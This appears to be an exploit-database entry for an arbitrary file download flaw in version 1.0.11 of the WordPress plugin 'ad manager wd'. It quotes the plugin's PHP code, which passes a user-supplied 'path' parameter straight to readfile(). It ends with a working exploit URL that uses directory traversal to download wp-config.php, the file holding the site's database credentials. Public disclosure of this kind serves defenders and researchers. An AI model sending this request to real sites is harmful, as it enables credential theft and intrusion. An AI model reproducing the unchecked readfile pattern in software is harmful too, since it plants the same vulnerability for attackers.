Exploit Title: WordPress Plugin ad manager wd v1.0.11 - Arbitrary File Download Google Dork: N/A Date: 25.01.2019 Vendor Homepage: https://web-dorado.com/products/wordpress-ad-manager-wd.html Software: https://wordpress.org/plugins/ad-manager-wd Version: 1.0.11 Tested on: Win7 x64, Exploit Author: 41!kh4224rDz Author Mail : scanweb18@gmail.com Vulnerability: wp-content\plugins\ad-manager-wd\wd_ads_admin_class.php 30/ if (isset($_GET['export']) && $_GET['export'] == 'export_csv') 97/ $path = $_GET['path']; header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Transfer-Encoding: binary'); header('Expires: 0'); header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Pragma: public'); header('Content-Type: text/csv; charset=utf-8'); header('Content-Disposition: attachment; filename=' . basename($path)); readfile($path); Arbitrary File Download/Exploit : http://localhost/wordpress/wp-admin/edit.php?post_type=wd_ads_ads&export=export_csv&path=../wp-config.php